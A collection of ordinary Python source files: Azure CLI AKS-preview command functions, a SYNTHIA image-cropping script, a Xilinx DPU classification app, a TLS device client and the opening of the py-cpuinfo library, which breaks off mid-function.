config_object.container_log_max_files = kubelet_config.get(
"containerLogMaxFiles", None)
config_object.container_log_max_size_mb = kubelet_config.get(
"containerLogMaxSizeMB", None)
config_object.pod_max_pids = kubelet_config.get(
"podMaxPids", None)
return config_object
def _get_linux_os_config(file_path):
if not os.path.isfile(file_path):
raise CLIError(
"{} is not valid file, or not accessable.".format(file_path))
os_config = get_file_json(file_path)
if not isinstance(os_config, dict):
raise CLIError(
"Error reading Linux OS configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = LinuxOSConfig()
config_object.transparent_huge_page_enabled = os_config.get(
"transparentHugePageEnabled", None)
config_object.transparent_huge_page_defrag = os_config.get(
"transparentHugePageDefrag", None)
config_object.swap_file_size_mb = os_config.get("swapFileSizeMB", None)
# sysctl settings
sysctls = os_config.get("sysctls", None)
if not isinstance(sysctls, dict):
raise CLIError(
"Error reading Sysctl settings at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object.sysctls = SysctlConfig()
config_object.sysctls.net_core_somaxconn = sysctls.get(
"netCoreSomaxconn", None)
config_object.sysctls.net_core_netdev_max_backlog = sysctls.get(
"netCoreNetdevMaxBacklog", None)
config_object.sysctls.net_core_rmem_max = sysctls.get(
"netCoreRmemMax", None)
config_object.sysctls.net_core_wmem_max = sysctls.get(
"netCoreWmemMax", None)
config_object.sysctls.net_core_optmem_max = sysctls.get(
"netCoreOptmemMax", None)
config_object.sysctls.net_ipv4_tcp_max_syn_backlog = sysctls.get(
"netIpv4TcpMaxSynBacklog", None)
config_object.sysctls.net_ipv4_tcp_max_tw_buckets = sysctls.get(
"netIpv4TcpMaxTwBuckets", None)
config_object.sysctls.net_ipv4_tcp_fin_timeout = sysctls.get(
"netIpv4TcpFinTimeout", None)
config_object.sysctls.net_ipv4_tcp_keepalive_time = sysctls.get(
"netIpv4TcpKeepaliveTime", None)
config_object.sysctls.net_ipv4_tcp_keepalive_probes = sysctls.get(
"netIpv4TcpKeepaliveProbes", None)
config_object.sysctls.net_ipv4_tcpkeepalive_intvl = sysctls.get(
"netIpv4TcpkeepaliveIntvl", None)
config_object.sysctls.net_ipv4_tcp_rmem = sysctls.get(
"netIpv4TcpRmem", None)
config_object.sysctls.net_ipv4_tcp_wmem = sysctls.get(
"netIpv4TcpWmem", None)
config_object.sysctls.net_ipv4_tcp_tw_reuse = sysctls.get(
"netIpv4TcpTwReuse", None)
config_object.sysctls.net_ipv4_ip_local_port_range = sysctls.get(
"netIpv4IpLocalPortRange", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh1 = sysctls.get(
"netIpv4NeighDefaultGcThresh1", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh2 = sysctls.get(
"netIpv4NeighDefaultGcThresh2", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh3 = sysctls.get(
"netIpv4NeighDefaultGcThresh3", None)
config_object.sysctls.net_netfilter_nf_conntrack_max = sysctls.get(
"netNetfilterNfConntrackMax", None)
config_object.sysctls.net_netfilter_nf_conntrack_buckets = sysctls.get(
"netNetfilterNfConntrackBuckets", None)
config_object.sysctls.fs_inotify_max_user_watches = sysctls.get(
"fsInotifyMaxUserWatches", None)
config_object.sysctls.fs_file_max = sysctls.get("fsFileMax", None)
config_object.sysctls.fs_aio_max_nr = sysctls.get("fsAioMaxNr", None)
config_object.sysctls.fs_nr_open = sysctls.get("fsNrOpen", None)
config_object.sysctls.kernel_threads_max = sysctls.get(
"kernelThreadsMax", None)
config_object.sysctls.vm_max_map_count = sysctls.get("vmMaxMapCount", None)
config_object.sysctls.vm_swappiness = sysctls.get("vmSwappiness", None)
config_object.sysctls.vm_vfs_cache_pressure = sysctls.get(
"vmVfsCachePressure", None)
return config_object
def _get_http_proxy_config(file_path):
if not os.path.isfile(file_path):
raise CLIError(
"{} is not valid file, or not accessable.".format(file_path))
hp_config = get_file_json(file_path)
if not isinstance(hp_config, dict):
raise CLIError(
"Error reading Http Proxy Config at {}. Please see https://aka.ms/HttpProxyConfig for correct format.".format(file_path))
config_object = ManagedClusterHTTPProxyConfig()
config_object.http_proxy = hp_config.get("httpProxy", None)
config_object.https_proxy = hp_config.get("httpsProxy", None)
config_object.no_proxy = hp_config.get("noProxy", None)
config_object.trusted_ca = hp_config.get("trustedCa", None)
return config_object
def aks_pod_identity_add(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace, identity_resource_id,
binding_selector=None,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
user_assigned_identity = _get_user_assigned_identity(
cmd.cli_ctx, identity_resource_id)
_ensure_managed_identity_operator_permission(
cmd.cli_ctx, instance, user_assigned_identity.id)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
pod_identities = instance.pod_identity_profile.user_assigned_identities
pod_identity = ManagedClusterPodIdentity(
name=identity_name,
namespace=identity_namespace,
identity=UserAssignedIdentity(
resource_id=user_assigned_identity.id,
client_id=user_assigned_identity.client_id,
object_id=user_assigned_identity.principal_id,
)
)
if binding_selector is not None:
pod_identity.binding_selector = binding_selector
pod_identities.append(pod_identity)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(
cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_delete(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
for pod_identity in instance.pod_identity_profile.user_assigned_identities:
if pod_identity.name == identity_name and pod_identity.namespace == identity_namespace:
# to remove
continue
pod_identities.append(pod_identity)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(
cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_list(cmd, client, resource_group_name, cluster_name): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
def aks_pod_identity_exception_add(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
pod_identity_exceptions = instance.pod_identity_profile.user_assigned_identity_exceptions
exc = ManagedClusterPodIdentityException(
name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions.append(exc)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(
cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_delete(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
# to remove
continue
pod_identity_exceptions.append(exc)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(
cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_update(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
found_target = False
updated_exc = ManagedClusterPodIdentityException(
name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
found_target = True
pod_identity_exceptions.append(updated_exc)
else:
pod_identity_exceptions.append(exc)
if not found_target:
raise CLIError(
'pod identity exception {}/{} not found'.format(exc_namespace, exc_name))
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(
cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_list(cmd, client, resource_group_name, cluster_name):
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
def _ensure_cluster_identity_permission_on_kubelet_identity(cli_ctx, cluster_identity_object_id, scope):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope.lower() != scope.lower():
continue
if not i.role_definition_id.lower().endswith(CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID):
continue
if i.principal_id.lower() != cluster_identity_object_id.lower():
continue
# already assigned
return
if not add_role_assignment(cli_ctx, CONST_MANAGED_IDENTITY_OPERATOR_ROLE, cluster_identity_object_id,
is_service_principal=False, scope=scope):
raise CLIError(
'Could not grant Managed Identity Operator permission to cluster identity at scope {}'.format(scope))
def aks_egress_endpoints_list(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
return client.list_outbound_network_dependencies_endpoints(resource_group_name, name)
def aks_snapshot_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
name,
cluster_id,
location=None,
tags=None,
aks_custom_headers=None,
no_wait=False):
rg_location = get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
creationData = CreationData(
source_resource_id=cluster_id
)
snapshot = ManagedClusterSnapshot(
name=name,
tags=tags,
location=location,
creation_data=creationData,
snapshot_type="ManagedCluster",
)
headers = get_aks_custom_headers(aks_custom_headers)
return client.create_or_update(resource_group_name, name, snapshot, headers=headers)
def aks_snapshot_show(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
snapshot = client.get(resource_group_name, name)
return snapshot
def aks_snapshot_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
no_wait=False,
yes=False):
from knack.prompting import prompt_y_n
msg = 'This will delete the cluster snapshot "{}" in resource group "{}", Are you sure?'.format(
name, resource_group_name)
if not yes and not prompt_y_n(msg, default="n"):
return None
return client.delete(resource_group_name, name)
def aks_snapshot_list(cmd, client, resource_group_name=None): # pylint: disable=unused-argument
if resource_group_name is None or resource_group_name == '':
return client.list()
return client.list_by_resource_group(resource_group_name)
def aks_nodepool_snapshot_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
snapshot_name,
nodepool_id,
location=None,
tags=None,
aks_custom_headers=None,
no_wait=False):
rg_location = get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
creationData = CreationData(
source_resource_id=nodepool_id
)
snapshot = Snapshot(
name=snapshot_name,
tags=tags,
location=location,
creation_data=creationData
)
headers = get_aks_custom_headers(aks_custom_headers)
return client.create_or_update(resource_group_name, snapshot_name, snapshot, headers=headers)
def aks_nodepool_snapshot_show(cmd, client, resource_group_name, snapshot_name): # pylint: disable=unused-argument
snapshot = client.get(resource_group_name, snapshot_name)
return snapshot
def aks_nodepool_snapshot_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
snapshot_name,
no_wait=False,
yes=False):
from knack.prompting import prompt_y_n
msg = 'This will delete the nodepool snapshot "{}" in resource group "{}", Are you sure?'.format(
snapshot_name, resource_group_name)
if not yes and not prompt_y_n(msg, default="n"):
return None
return client.delete(resource_group_name, snapshot_name)
def aks_nodepool_snapshot_list(cmd, client, resource_group_name=None): # pylint: disable=unused-argument
if resource_group_name is None or resource_group_name == '':
return client.list()
return client.list_by_resource_group(resource_group_name)
|
prepare_data.py
|
import os
import os.path
import argparse
from multiprocessing import Process
import cv2
# this function makes a directory
def make_dir(path):
if not os.path.isdir(path):
os.mkdir(path)
# this function processes the depth image
def process_depth(input_depth_path, output_depth_path):
depth = cv2.imread(input_depth_path, cv2.IMREAD_UNCHANGED)
h_in, w_in, _ = depth.shape
depth_cropped = depth[(h_in//2) - (h_out//2) : (h_in//2) + (h_out//2), (w_in//2) - (w_out//2) : (w_in//2) + (w_out//2)]
depth_cropped_b, depth_cropped_g, depth_cropped_r = cv2.split(depth_cropped)
cv2.imwrite(output_depth_path, depth_cropped_r)
# this function processes the RGB image
def process_rgb(input_rgb_path, output_rgb_path):
rgb = cv2.imread(input_rgb_path, cv2.IMREAD_COLOR)
h_in, w_in, _ = rgb.shape
rgb_cropped = rgb[(h_in//2) - (h_out//2) : (h_in//2) + (h_out//2), (w_in//2) - (w_out//2) : (w_in//2) + (w_out//2)]
cv2.imwrite(output_rgb_path, rgb_cropped)
# this function processes the class label image
def process_gt(input_gt_path, output_gt_path):
gt = cv2.imread(input_gt_path, cv2.IMREAD_UNCHANGED)
h_in, w_in, _ = gt.shape
gt_cropped = gt[(h_in//2) - (h_out//2) : (h_in//2) + (h_out//2), (w_in//2) - (w_out//2) : (w_in//2) + (w_out//2)]
gt_cropped_b, gt_cropped_g, gt_cropped_r = cv2.split(gt_cropped)
cv2.imwrite(output_gt_path, gt_cropped_r)
parser = argparse.ArgumentParser('processing data!')
parser.add_argument('--input_root', type=str, default="/media/amir/storage2/Data/synthia/unrarred", help='point it towards the synthia root.')
parser.add_argument('--output_root', type=str, default="/media/amir/storage2/Data/synthia/new", help='point it towards where you want to copy everything. The directoty called processed-new will be made here.')
parser.add_argument('--height', type=int, default=256, help='height of the center crop')
parser.add_argument('--width', type=int, default=1024, help='width of the center crop')
args = parser.parse_args()
root_input_path = args.input_root
make_dir(args.output_root)
root_output_path = os.path.join(args.output_root, 'processed')
make_dir(root_output_path)
seq_output_path = os.path.join(root_output_path, '%d')
h_out = args.height
w_out = args.width
i = 1
main_seqS = os.listdir(root_input_path)
main_seqS.sort()
faceS = ['B', 'F', 'L', 'R']
left_rightS = ['Left', 'Right']
_depth_dir = os.path.join(root_input_path, '%s', 'Depth', 'Stereo_'+'%s', 'Omni_'+'%s')
_rgb_dir = os.path.join(root_input_path, '%s', 'RGB', 'Stereo_'+'%s', 'Omni_'+'%s')
_seg_dir = os.path.join(root_input_path, '%s', 'GT', 'LABELS' , 'Stereo_'+'%s', 'Omni_'+'%s')
print('starting...')
for seq in main_seqS:
for left_right in left_rightS:
for face in faceS:
input_depth_dir = _depth_dir % (seq, left_right, face)
input_rgb_dir = _rgb_dir % (seq, left_right, face)
input_seg_dir = _seg_dir % (seq, left_right, face)
if (os.path.isdir(input_seg_dir) and os.path.isdir(input_depth_dir) and os.path.isdir(input_rgb_dir)):
num_rgb_files = len([name for name in os.listdir(input_rgb_dir) if os.path.isfile(os.path.join(input_rgb_dir, name))])
num_depth_files = len([name for name in os.listdir(input_depth_dir) if os.path.isfile(os.path.join(input_depth_dir, name))])
num_seg_files = len([name for name in os.listdir(input_seg_dir) if os.path.isfile(os.path.join(input_seg_dir, name))])
if(num_rgb_files == num_depth_files and num_depth_files == num_seg_files):
make_dir(seq_output_path % i)
output_rgb_dir = os.path.join(seq_output_path % i, 'RGB')
output_depth_dir = os.path.join(seq_output_path % i, 'Depth')
output_seg_dir = os.path.join(seq_output_path % i, 'GT')
make_dir(output_rgb_dir)
make_dir(output_depth_dir)
make_dir(output_seg_dir)
print('processing %d images from %s and writing them in %s.' % (num_rgb_files, input_rgb_dir, output_rgb_dir))
for frm_num in range(num_rgb_files):
input_rgb_path = os.path.join(input_rgb_dir, '%06d.png' % (frm_num))
input_depth_path = os.path.join(input_depth_dir, '%06d.png' % (frm_num))
input_gt_path = os.path.join(input_seg_dir, '%06d.png' % (frm_num))
output_rgb_path = os.path.join(output_rgb_dir, '%06d.png' % (frm_num))
output_depth_path = os.path.join(output_depth_dir, '%06d.png' % (frm_num))
output_gt_path = os.path.join(output_seg_dir, '%06d.png' % (frm_num))
p_depth = Process(target=process_depth, args=(input_depth_path, output_depth_path,))
p_rgb = Process(target=process_rgb, args=(input_rgb_path, output_rgb_path,))
p_gt = Process(target=process_gt, args=(input_gt_path, output_gt_path,))
p_depth.start()
p_rgb.start()
p_gt.start()
p_depth.join()
p_rgb.join()
p_gt.join()
print(' ... Done!')
i+=1
print('All finished. %s sequnces have been processed' % i)
|
app_mt.py
|
'''
Copyright 2020 Xilinx Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
'''
Author: Mark Harvey, Xilinx Inc
'''
from ctypes import *
from typing import List
import cv2
import numpy as np
import vart
import os
import pathlib
import xir
import threading
import time
import sys
import argparse
divider = '-----------------------------------------------'
def preprocess_fn(image_path):
'''
Image pre-processing.
Rearranges from BGR to RGB then normalizes to range 0:1
input arg: path of image file
return: numpy array
'''
image = cv2.imread(image_path)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = image/255.0
return image
def get_child_subgraph_dpu(graph: "Graph") -> List["Subgraph"]:
'''
interrogate model file to return subgraphs
Returns a list of subgraph objects
'''
assert graph is not None, "'graph' should not be None."
root_subgraph = graph.get_root_subgraph()
assert (root_subgraph is not None), "Failed to get root subgraph of input Graph object."
if root_subgraph.is_leaf:
return []
child_subgraphs = root_subgraph.toposort_child_subgraph()
assert child_subgraphs is not None and len(child_subgraphs) > 0
return [
cs
for cs in child_subgraphs
if cs.has_attr("device") and cs.get_attr("device").upper() == "DPU"
]
def runDPU(id,start,dpu,img):
'''
DPU execution - called in thread from app function.
Arguments:
id: integer to identify thread - not currently used
start: Start index for writes to out_q.
dpu: runner
img: list of pre-processed images to pass into DPU
'''
''' input/output tensor information
get_input_tensors() and get_output_tensors() return lists of tensors objects.
The lists will contain one element for each input or output of the network.
The shape of each tensor object is (batch,height,width,channels)
For Zynq DPUCZDX8G DPU, batchsize is always 1 and this code can be simplified.
'''
inputTensors = dpu.get_input_tensors()
outputTensors = dpu.get_output_tensors()
input_ndim = tuple(inputTensors[0].dims)
output_ndim = tuple(outputTensors[0].dims)
batchSize = input_ndim[0]
n_of_images = len(img)
count = 0
write_index = start
while count < n_of_images:
if (count+batchSize<=n_of_images):
runSize = batchSize
else:
runSize=n_of_images-count
'''prepare batch input/output '''
outputData = []
inputData = []
inputData = [np.empty(input_ndim, dtype=np.float32, order="C")]
outputData = [np.empty(output_ndim, dtype=np.float32, order="C")]
'''init input image to input buffer '''
for j in range(runSize):
imageRun = inputData[0]
imageRun[j, ...] = img[(count + j) % n_of_images].reshape(input_ndim[1:])
'''run with batch '''
job_id = dpu.execute_async(inputData,outputData)
dpu.wait(job_id)
'''store output vectors in global results list '''
for j in range(runSize):
out_q[write_index] = np.argmax(outputData[0][j])
write_index += 1
count = count + runSize
return
def app(image_dir,threads,model):
'''
main application function
'''
listimage=os.listdir(image_dir)
runTotal = len(listimage[:2500])
print('Found',len(listimage),'images - processing',runTotal,'of them')
''' global list that all threads can write results to '''
global out_q
out_q = [None] * runTotal
''' get a list of subgraphs from the compiled model file '''
g = xir.Graph.deserialize(model)
subgraphs = get_child_subgraph_dpu(g)
print('Found',len(subgraphs),'subgraphs in',model)
''' create dpu runners
Each thread receives a dpu runner.
Each dpu runner executes a subgraph
'''
all_dpu_runners = []
for i in range(threads):
all_dpu_runners.append(vart.Runner.create_runner(subgraphs[0], "run"))
''' preprocess images '''
print('Pre-processing',runTotal,'images...')
img = []
for i in range(runTotal):
path = os.path.join(image_dir,listimage[i])
img.append(preprocess_fn(path))
''' create threads
Each thread receives a section of the preprocessed images list as input and
will write results into the corresponding section of the global out_q list.
'''
threadAll = []
start=0
for i in range(threads):
if (i==threads-1):
end = len(img)
else:
end = start+(len(img)//threads)
in_q = img[start:end]
t1 = threading.Thread(target=runDPU, args=(i,start,all_dpu_runners[i], in_q))
threadAll.append(t1)
start=end
'''run threads '''
print('Starting',threads,'threads...')
time1 = time.time()
for x in threadAll:
x.start()
for x in threadAll:
x.join()
time2 = time.time()
threads_time = time2 - time1
''' post-processing '''
classes = ['dog','cat']
correct = 0
wrong = 0
for i in range(len(out_q)):
prediction = classes[out_q[i]]
ground_truth, _ = listimage[i].split('.',1)
if (ground_truth==prediction):
correct += 1
else:
wrong += 1
accuracy = correct/len(out_q)
print (divider)
print('Correct:%d, Wrong:%d, Accuracy:%.4f' %(correct,wrong,accuracy))
print (divider)
fps = float(runTotal / threads_time)
print('FPS: %.2f, total frames: %.0f, total time: %.3f seconds' %(fps,runTotal,threads_time))
print (divider)
return
# only used if script is run as 'main' from command line
def main():
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument('-d', '--image_dir',type=str,default='images', help='Path to folder of images. Default is images')
ap.add_argument('-t', '--threads', type=int,default=1, help='Number of threads. Default is 1')
ap.add_argument('-m', '--model', type=str,default='model_dir/alexnet_np.xmodel', help='Path of folder containing .xmodel. Default is model_dir/alexnet_np.xmodel')
args = ap.parse_args()
print (divider)
print ('Command line options:')
print (' --image_dir : ', args.image_dir)
print (' --threads : ', args.threads)
print (' --model : ', args.model)
print (divider)
app(args.image_dir,args.threads,args.model)
if __name__ == '__main__':
main()
|
Client.py
|
import ssl, socket, threading
from Device import Device
from DataFormatter import Protocol_Receive, Protocol_Send
from Commands import CLI_Command_Handler
import Config
#Connects to the server on given ip/port and creates send thread. We also send initial data to the server (Name/type)
def Connect(host, port):
context = ssl.create_default_context() #helps create SSLContext objects for common purposes
context.load_verify_locations('./Auth/certificate.pem') #Load the cert so it will be accepted since it is self signed
connection = context.wrap_socket(socket.socket(socket.AF_INET), #Wrap the socket with TLS
server_hostname=host)
connection.connect((host, port)) #Connect to the server
print(f"Connected to {host}:{port}")
device_setup_message = f"{device.name} {device.archetype} {device.id}" #Create the setup message
Protocol_Send(connection, device_setup_message) #Send the device setup message
Device.this_device.id=Protocol_Receive(connection) #Receieve and set the id. If the device id was anything but -1 you will recieve the same id as you had sent.
receive_thread = threading.Thread(target=Receive_Data, args=(connection,)) #Create and start a thread to recieve data
receive_thread.start()
return connection #Returns the connection object
###Receives data from the given connection and runs it against client_command from serverhelper
def Receive_Data(connection):
global connected
while connected: #If we have an active connection
try:
message = Protocol_Receive(connection) #Recieve message from server
CLI_Command_Handler.Terminal_Command(message,True) #Checks for commands if no command is found prints to console.
except:
print("Connection to host lost.") #If no more data is flowing, we have disconnected from the server
connected = False #Set connected to false
###The terminal for the client to enter commands and send data to server from
def Terminal():
while True:
try:
data_input = input("\n")
CLI_Command_Handler.Terminal_Command(data_input, False)
except Exception as e:
print(e)
#PRE UI FUNCTIONALITY
if __name__ == "__main__":
name = input("Name your device: ").lower() #set our name
archetype = input("Give your device a type: ").lower() #set our archetype
device = Device(name, archetype) #create our device object
connected = False #Initialize connected bool
terminal_thread = threading.Thread(target=Terminal) #Create and start the terminal thread
terminal_thread.start()
while True:
if connected == False: #If we are not connected.
try: #Constantly try to reconnect to the server
connected = True
connection = Connect(Config.SERVER_IP, Config.SERVER_PORT)
device.server = connection
except: #If we fail to connect set connected to false so we try again
connected = False
print("Failed to connect. Trying again...")
|
cpuinfo.py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# source: https://github.com/workhorsy/py-cpuinfo/blob/v4.0.0/cpuinfo/cpuinfo.py
# version: 4.0.0
# date: 2018-05-05
# Copyright (c) 2014-2018, Matthew Brennan Jones <matthew.brennan.jones@gmail.com>
# Py-cpuinfo gets CPU info with pure Python 2 & 3
# It uses the MIT License
# It is hosted at: https://github.com/workhorsy/py-cpuinfo
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
CPUINFO_VERSION = (4, 0, 0)
import os, sys
import glob
import re
import time
import platform
import multiprocessing
import ctypes
import pickle
import base64
import subprocess
try:
import _winreg as winreg
except ImportError as err:
try:
import winreg
except ImportError as err:
pass
PY2 = sys.version_info[0] == 2
# Load hacks for Windows
if platform.system().lower() == 'windows':
# Monkey patch multiprocessing's Popen to fork properly on Windows Pyinstaller
# https://github.com/pyinstaller/pyinstaller/wiki/Recipe-Multiprocessing
try:
import multiprocessing.popen_spawn_win32 as forking
except ImportError as err:
try:
import multiprocessing.popen_fork as forking
except ImportError as err:
import multiprocessing.forking as forking
class _Popen(forking.Popen):
def __init__(self, *args, **kw):
if hasattr(sys, 'frozen'):
# We have to set original _MEIPASS2 value from sys._MEIPASS
# to get --onefile mode working.
os.putenv('_MEIPASS2', sys._MEIPASS)
try:
super(_Popen, self).__init__(*args, **kw)
finally:
if hasattr(sys, 'frozen'):
# On some platforms (e.g. AIX) 'os.unsetenv()' is not
# available. In those cases we cannot delete the variable
# but only set it to the empty string. The bootloader
# can handle this case.
if hasattr(os, 'unsetenv'):
os.unsetenv('_MEIPASS2')
else:
os.putenv('_MEIPASS2', '')
forking.Popen = _Popen
class DataSource(object):
bits = platform.architecture()[0]
cpu_count = multiprocessing.cpu_count()
is_windows = platform.system().lower() == 'windows'
raw_arch_string = platform.machine()
can_cpuid = True
@staticmethod
def has_proc_cpuinfo():
return os.path.exists('/proc/cpuinfo')
@staticmethod
def has_dmesg():
return len(program_paths('dmesg')) > 0
@staticmethod
def has_var_run_dmesg_boot():
uname = platform.system().strip().strip('"').strip("'").strip().lower()
return 'linux' in uname and os.path.exists('/var/run/dmesg.boot')
@staticmethod
def has_cpufreq_info():
return len(program_paths('cpufreq-info')) > 0
@staticmethod
def has_sestatus():
return len(program_paths('sestatus')) > 0
@staticmethod
def has_sysctl():
return len(program_paths('sysctl')) > 0
@staticmethod
def has_isainfo():
return len(program_paths('isainfo')) > 0
@staticmethod
def has_kstat():
return len(program_paths('kstat')) > 0
@staticmethod
def has_sysinfo():
return len(program_paths('sysinfo')) > 0
@staticmethod
def has_lscpu():
return len(program_paths('lscpu')) > 0
@staticmethod
def has_ibm_pa_features():
return len(program_paths('lsprop')) > 0
@staticmethod
def has_wmic():
returncode, output = run_and_get_stdout(['wmic', 'os', 'get', 'Version'])
return returncode == 0 and len(output) > 0
@staticmethod
def cat_proc_cpuinfo():
return run_and_get_stdout(['cat', '/proc/cpuinfo'])
@staticmethod
def cpufreq_info():
return run_and_get_stdout(['cpufreq-info'])
@staticmethod
def sestatus_allow_execheap():
return run_and_get_stdout(['sestatus', '-b'], ['grep', '-i', '"allow_execheap"'])[1].strip().lower().endswith('on')
@staticmethod
def sestatus_allow_execmem():
return run_and_get_stdout(['sestatus', '-b'], ['grep', '-i', '"allow_execmem"'])[1].strip().lower().endswith('on')
@staticmethod
def dmesg_a():
return run_and_get_stdout(['dmesg', '-a'])
@staticmethod
def cat_var_run_dmesg_boot():
return run_and_get_stdout(['cat', '/var/run/dmesg.boot'])
@staticmethod
def sysctl_machdep_cpu_hw_cpufrequency():
return run_and_get_stdout(['sysctl', 'machdep.cpu', 'hw.cpufrequency'])
@staticmethod
def isainfo_vb():
return run_and_get_stdout(['isainfo', '-vb'])
@staticmethod
def kstat_m_cpu_info():
return run_and_get_stdout(['kstat', '-m', 'cpu_info'])
@staticmethod
def sysinfo_cpu():
